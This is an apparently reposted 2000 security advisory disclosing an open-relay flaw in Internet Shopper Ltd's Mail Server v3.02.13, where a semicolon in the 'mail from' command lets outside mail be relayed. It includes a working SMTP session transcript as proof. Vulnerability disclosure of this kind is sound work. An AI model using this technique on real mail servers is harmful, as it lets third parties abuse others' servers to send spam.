[ SOURCE: http://www.secureroot.com/security/advisories/9693913875.html ]

Internet Shopper Ltd's Mail Server Open relay bug.



(I have been unable to make contact with Internet Shopper Ltd, and

as this bug might easily be found accidently I have decide to make

it public)



SUMMARY:



Internet Shopper Ltd's Mail Server can be made to accept and

handle mail for non-local sites.



DETAILS:



Version involved:



Internet Shopper Ltd's Mail Server v3.02.13



No other versions have been tested.



Exploit:



The use of the semi-colon in the "mail from" command will allow

mail to be sent to machine that aren't local.



Exploit in action:



220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server

v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100

helo me

250 mailsvr.xxxxxxxxxx.ac.uk me

mail from;

250 Ok.

rcpt to: ImranG@btinternet.com

250 Ok.

data

354 Start mail input, end with <CRLF>.<CRLF>.



Test data

.

250 Requested mail action Ok.

quit

221 Goodbye me



Fix:



None known at this time.



Imran Ghory